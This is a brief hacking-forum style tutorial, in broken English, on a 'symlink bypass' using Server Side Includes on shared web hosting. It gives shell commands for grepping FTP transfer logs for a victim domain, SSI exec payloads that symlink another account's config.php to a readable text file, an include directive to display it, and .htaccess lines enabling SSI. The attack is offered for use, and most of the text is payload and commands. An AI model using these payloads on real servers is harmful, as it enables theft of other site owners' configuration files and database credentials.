[+] Shtml Bypass Symlink - via 404 Error [+]

Well today I symlink bypass method using Server Side Includes I'm a little explanation. To do this the first step we need to find a server on the Server Side Includes.

PHP Code:cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com

Now we come shtml file using a command will run ourselvesPHP Code:

<!--#exec cmd="more xferlog.*|grep victim.com" -->

For example, the Symlynk.ln -s /home/...../public_html/config.php config.txt Come face to face.PHP Code:

<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->

I'll run the script that I wrote that I do not think that hatches from Litespeed.

Now we come to read config.txt file in a shtml file I create and use the following.

PHP Code:

<!--#include virtual="config.txt" -->

So far so error 404 . htaccess

PHP Code:

Options +IncludesAddType text/html .shtmlAddHandler server-parsed .shtml Thank u so much for reading xD
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